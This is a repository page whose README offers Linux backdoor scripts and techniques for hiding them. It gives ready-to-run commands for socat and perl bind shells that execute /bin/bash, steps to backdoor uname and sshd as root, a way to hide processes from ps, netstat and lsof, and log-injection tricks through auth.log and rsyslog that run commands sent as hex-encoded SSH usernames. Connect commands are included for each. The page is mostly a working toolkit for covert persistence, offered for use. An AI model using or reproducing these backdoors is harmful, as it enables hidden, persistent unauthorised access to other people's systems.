You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
iamckn f811b1f4a3
Updated README
2 years ago
README.md Updated README 2 years ago
bd_hide.sh Initial upload 2 years ago
bd_hide_c.sh Initial upload 2 years ago
bd_sshd.sh Initial upload 2 years ago
bd_uname.sh Initial upload 2 years ago
bd_uname_c.sh Initial upload 2 years ago

README.md

backdoors

Simple linux backdoors and hiding techniques

bd_uname.sh

Uncomment the preferred backdoor

Run the script as root to backdoor the uname command

Connect to the backdoor depending on the choice

socat STDIO TCP4:IP:4444
  or
socat STDIO TCP4:IP:3177
  or
socat STDIO SCTP:IP:1177
  or
socat STDIO TCP4:IP:1337

bd_hide.sh

Run the script to protect the backdoor from discovery through ps, netstat or lsof

bd_sshd.sh

Run the script to backdoor the sshd server

Connect to the backdoor by running

socat STDIO TCP4:<target ip>:22,sourceport=19526

bd_uname_c.sh

Same as bd_uname.sh but creates a backdoored binary instead of a shell script

bd_hide_c.sh

Same as bd_hide.sh but creates backdoored binaries instead of shell scripts

Backdoor Techniques

SOCAT TCP

LISTEN:

socat TCP4-Listen:3177,fork EXEC:/bin/bash &

CONNECT:

socat STDIO TCP4:IP:3177

SOCAT SCTP

LISTEN:

socat SCTP-Listen:1177,fork EXEC:/bin/bash &

CONNECT:

socat STDIO SCTP:IP:1177

PERL TCP

LISTEN:

perl -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}' &

CONNECT:

socat STDIO TCP4:IP:1337

AUTH.LOG

LISTEN:

perl -e'while(1){sleep(1);while(<>){system pack("H*",$1)if/LEGO(\w+)/}}'</var/log/auth.log & 

EXECUTE REMOTE COMMAND:

perl -e 'print "LEGO".unpack("H*","id > /tmp/auth.owned")."\n"'
LEGO6964203e202f746d702f617574682e6f776e6564
ssh LEGO6964203e202f746d702f617574682e6f776e6564@<target_ip>

RSYSLOG

LISTEN:

man -a rsyslogd syslog|perl -pe'print "auth.* ^/bin/atg "if$.==177;print"#"' > /etc/rsyslog.d/README.conf
echo -e '#!/bin/sh\nsh -c "$1"'>/bin/atg
chmod 755 /bin/atg
/etc/init.d/rsyslog restart

EXECUTE:

echo "';whoami>/tmp/rsyslogd.owned;'"| socat STDIO TCP4:<target ip>:22